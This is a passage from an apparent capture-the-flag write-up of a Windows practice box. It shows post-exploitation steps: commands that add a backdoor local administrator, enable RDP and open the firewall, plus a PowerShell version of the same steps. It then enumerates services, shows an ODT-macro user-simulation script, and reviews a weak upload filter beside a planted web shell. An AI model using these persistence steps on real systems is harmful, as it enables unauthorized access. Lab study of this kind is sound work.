Beyond
After the target system is fully compromised, additional post-exploitation enumeration and assessment are performed on this page as SYSTEM.
C:\Windows\system32> net users /ADD adm1n qwer1234 && net localgroup administrators /ADD adm1n
The command completed successfully.
The command completed successfully.
C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && netsh firewall add portopening TCP 3389 "Remote Desktop"
The operation completed successfully.
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
Ok.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft]
└─$ xfreerdp /u:adm1n /p:'qwer1234' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0
RDP
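The same three steps (backdoor local admin, enable RDP, open the firewall) written with supported cmdlets instead of the deprecated "netsh firewall", followed by a verification of each step. This is an added example and not part of the original write-up; the account name and password are the ones used above, and the "Remote Desktop" firewall display group is the built-in one on recent Windows versions.

```powershell
# Added example: supported-cmdlet equivalent of the net/reg/netsh one-liners above.
# Assumes it is run from an elevated (SYSTEM or administrator) PowerShell on the target.
$User = 'adm1n'                                   # same account as on the page
$Pass = ConvertTo-SecureString 'qwer1234' -AsPlainText -Force

# 1. Local admin account: equivalent of "net users /ADD" + "net localgroup administrators /ADD"
if (-not (Get-LocalUser -Name $User -ErrorAction SilentlyContinue)) {
    New-LocalUser -Name $User -Password $Pass -PasswordNeverExpires | Out-Null
}
Add-LocalGroupMember -Group 'Administrators' -Member $User -ErrorAction SilentlyContinue

# 2. Enable RDP: the same registry value the page sets with "reg add"
$ts = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
Set-ItemProperty -Path $ts -Name fDenyTSConnections -Value 0 -Type DWord

# 3. Firewall: replacement for the deprecated "netsh firewall add portopening TCP 3389"
Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'

# 4. Verify every step before leaving the shell
[pscustomobject]@{
    IsLocalAdmin   = [bool](Get-LocalGroupMember -Group 'Administrators' |
                            Where-Object Name -like "*\$User")
    RdpEnabled     = (Get-ItemProperty -Path $ts -Name fDenyTSConnections).fDenyTSConnections -eq 0
    FirewallRuleOn = [bool](Get-NetFirewallRule -DisplayGroup 'Remote Desktop' |
                            Where-Object Enabled -eq 'True')
    Listening3389  = [bool](Get-NetTCPConnection -LocalPort 3389 -State Listen -ErrorAction SilentlyContinue)
}
```

All four fields should read True before trying xfreerdp. These are loud changes on a real engagement (new local admin, new firewall state); on cleanup reverse them with Remove-LocalUser, set fDenyTSConnections back to 1 and Disable-NetFirewallRule -DisplayGroup 'Remote Desktop'.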
Services
PS C:\Windows\system32> sc.exe qc ApacheHTTPServer
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ApacheHTTPServer
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Xampp\apache\bin\httpd.exe" -k runservice
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Apache HTTP Server
DEPENDENCIES : Tcpip
: Afd
SERVICE_START_NAME : .\apache
Apache is started under the local account .\apache rather than LocalSystem, so anything executed through a web shell dropped in C:\xampp\htdocs runs with that account's rights only.
PS C:\Windows\system32> sc.exe qc ResumeService1
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ResumeService1
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\nssm-2.24\win64\nssm.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ResumeService1
DEPENDENCIES :
SERVICE_START_NAME : .\thecybergeek
ResumeService1 is not a normal service binary but an NSSM wrapper (nssm.exe; note the unquoted path containing a space) running as the local user .\thecybergeek, so whatever NSSM launches runs in that user's context.
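Rather than querying services one at a time with sc.exe qc, the following added example (not from the original write-up) lists every service that runs as something other than the built-in service accounts or starts from outside the Windows directory, and, for NSSM-wrapped services, reads the wrapped program from the registry instead of opening the nssm.exe edit GUI. It assumes the usual NSSM layout in which the wrapper stores its settings (Application, AppParameters, AppDirectory) under the service's Parameters key.

```powershell
# Added example: find services worth a second look and unwrap NSSM services from the registry.
$builtin = @('LocalSystem', 'NT AUTHORITY\LocalService', 'NT AUTHORITY\NetworkService')

function Get-NssmWrappedCommand {
    param([Parameter(Mandatory)][string]$ServiceName)
    # Assumption: NSSM keeps its configuration under HKLM\SYSTEM\...\Services\<name>\Parameters
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$ServiceName\Parameters"
    if (-not (Test-Path $key)) { return $null }
    $p = Get-ItemProperty -Path $key
    if (-not $p.Application) { return $null }
    [pscustomobject]@{
        Application   = $p.Application
        AppParameters = $p.AppParameters
        AppDirectory  = $p.AppDirectory
    }
}

function Get-SuspectService {
    Get-CimInstance Win32_Service | ForEach-Object {
        $path   = $_.PathName
        $isNssm = $path -match 'nssm(64)?\.exe'
        [pscustomobject]@{
            Name      = $_.Name
            RunsAs    = $_.StartName
            StartMode = $_.StartMode
            State     = $_.State
            Path      = $path
            # heuristic: unquoted path that contains a space (false positives when args follow)
            Unquoted  = ($path -notmatch '^"' -and $path -match '\s')
            Wrapped   = if ($isNssm) { Get-NssmWrappedCommand -ServiceName $_.Name } else { $null }
        }
    } | Where-Object {
        $_.RunsAs -notin $builtin -or $_.Path -notlike "$env:SystemRoot\*"
    }
}

Get-SuspectService | Format-List
```

On this box the output should include ApacheHTTPServer (RunsAs .\apache, path under C:\Xampp) and ResumeService1 (RunsAs .\thecybergeek, Unquoted = True, Wrapped showing the script NSSM runs). The same information is also available from the wrapper itself with nssm.exe get ResumeService1 Application and nssm.exe get ResumeService1 AppParameters, which do not open a dialog.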
NSSM
PS C:\Program Files\nssm-2.24\win64> .\nssm.exe edit ResumeService1
(nssm.exe edit opens the NSSM configuration dialog; the application NSSM launches for ResumeService1 is C:\Users\thecybergeek\Documents\resume.ps1)
PS C:\Program Files\nssm-2.24\win64> cat C:\Users\thecybergeek\Documents\resume.ps1
$resume = "C:\Users\thecybergeek\Documents\Resumes"
while($true) {
    # Moving Resumes
    move C:\xampp\htdocs\uploads\* $resume
    cmd /c 'icacls "C:\Users\thecybergeek\Documents\Resumes" /grant thecybergeek:(OI)(CI)F /T'
    # Avoiding Crash
    Remove-Item -Recurse -Force -Path C:\Users\thecybergeek\AppData\Roaming\LibreOffice\4\*
    Copy-Item -Path "C:\Users\thecybergeek\Documents\user" -Destination "C:\Users\thecybergeek\AppData\Roaming\LibreOffice\4\user" -Recurse
    cmd /c 'icacls "C:\Users\thecybergeek\AppData\Roaming\LibreOffice\4\user" /grant thecybergeek:(OI)(CI)F /T'
    Start-Sleep -s 5
    $files = ls $resume\*.odt
    if ( $files.length -gt 0) {
        # launch odt files
        Invoke-Item "C:\Users\thecybergeek\Documents\Resumes\*.odt"
        Start-Sleep -s 60
        # Killing Libre Office Instances
        Stop-Process -Name soffice* -Force
        Start-Sleep -s 15
    }
    Remove-Item -Recurse -force -Path $resume\*
    # Avoiding Crash
    Remove-Item -Recurse -Force -Path C:\Users\thecybergeek\AppData\Roaming\LibreOffice\4\*
    Copy-Item -Path "C:\Users\thecybergeek\Documents\user" -Destination "C:\Users\thecybergeek\AppData\Roaming\LibreOffice\4\user" -Recurse
    cmd /c 'icacls "C:\Users\thecybergeek\AppData\Roaming\LibreOffice\4\user" /grant thecybergeek:(OI)(CI)F /T'
    Start-Sleep -s 5
}
This script is what simulates user behaviour on the box: in an endless loop it moves everything from C:\xampp\htdocs\uploads into the Resumes folder, grants thecybergeek full control on it, resets the LibreOffice profile from a clean copy, opens every .odt with LibreOffice as thecybergeek (Invoke-Item), waits 60 seconds and then kills all soffice processes. That loop is what executes a macro embedded in an uploaded ODT file and gave the initial foothold.
Web
PS C:\xampp\htdocs> dir
Directory: C:\xampp\htdocs
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         7/13/2021   3:18 AM                assets
d-----         7/13/2021   3:18 AM                css
d-----         7/13/2021   3:18 AM                js
d-----          4/8/2025  11:04 AM                uploads
-a----          7/7/2021  10:53 AM           9635 index.php
-a----          4/8/2025  12:03 PM           9296 shell.php
-a----          4/8/2025  12:00 PM             20 test.txt
-a----          7/7/2021   9:56 AM            835 upload.php
PS C:\xampp\htdocs> cat .\upload.php
<?php
//Check if the file is well uploaded
if($_FILES['file']['error'] > 0) { echo 'Error during uploading, try again'; }

//Set up valid extension
$extsAllowed = array( 'odt' );
$extUpload = strtolower( substr( strrchr($_FILES['file']['name'], '.') ,1) ) ;

//Check if the uploaded file extension is allowed
if (in_array($extUpload, $extsAllowed) ) {
    //Upload the file on the server
    $name = "uploads/{$_FILES['file']['name']}";
    $result = move_uploaded_file($_FILES['file']['tmp_name'], $name);
    if($result){echo "You're resume was submitted , it will be reviewed shortly by our staff";}
} else { echo 'File is not valid. Please submit ODT file'; }

// Giving HR permission on the resume file
exec('cmd /c "icacls C:\xampp\htdocs\uploads /grant thecybergeek:(OI)(CI)F /T"');
?>
The source of upload.php shows how the extension filter works: it takes the text after the last dot of the client-supplied file name, lowercases it and compares it against an allowlist containing only odt, so a file is stored only if its name ends in .odt (in any case), while the content is never inspected and the original file name is reused as-is under uploads/. The file then lands in the uploads directory as the .\apache account, and every request, valid or not, finishes by exec'ing icacls to hand thecybergeek full control of C:\xampp\htdocs\uploads, which is what lets the resume.ps1 loop move and open the uploaded documents.
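Both resume.ps1 and upload.php keep re-granting thecybergeek full control with icacls, and the web root is served by a different local account. The added example below (not part of the original write-up) audits the directories named on the page and reports every allow entry that gives a non-privileged identity write-class rights, so the resulting permission state can be checked in one pass. The paths are the ones shown in the script and the PHP file; the set of identities treated as privileged is an assumption.

```powershell
# Added example: report non-privileged identities with write-class rights on the
# directories that upload.php and resume.ps1 touch. Paths are from the page.
$Paths = @(
    'C:\xampp\htdocs',
    'C:\xampp\htdocs\uploads',
    'C:\Users\thecybergeek\Documents\Resumes',
    'C:\Users\thecybergeek\AppData\Roaming\LibreOffice\4\user'
)

# Assumption: these are the only identities expected to have write access on a web root
$Privileged = '^(NT AUTHORITY\\SYSTEM|BUILTIN\\Administrators|NT SERVICE\\TrustedInstaller)$'

# Bits that let an identity change content or permissions; deliberately excludes the
# read/execute bits that Modify and ReadAndExecute share, to avoid false positives.
$WriteMask = [System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership'

function Get-WritableBy {
    param([Parameter(Mandatory)][string[]]$Path)
    foreach ($p in $Path) {
        if (-not (Test-Path -LiteralPath $p)) { Write-Warning "missing: $p"; continue }
        $acl = Get-Acl -LiteralPath $p
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($ace.IdentityReference.Value -match $Privileged) { continue }
            if (-not ($ace.FileSystemRights -band $WriteMask)) { continue }
            [pscustomobject]@{
                Path      = $p
                Owner     = $acl.Owner
                Identity  = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
                AppliesTo = "$($ace.InheritanceFlags)"
            }
        }
    }
}

Get-WritableBy -Path $Paths | Format-Table -AutoSize
```

On this box the output is expected to show thecybergeek with FullControl (OI)(CI) on uploads, Resumes and the LibreOffice profile, which is exactly what the two icacls calls produce; any additional identity, in particular the apache account or a group such as Users with write rights on C:\xampp\htdocs itself, is a finding worth reporting separately from the upload filter.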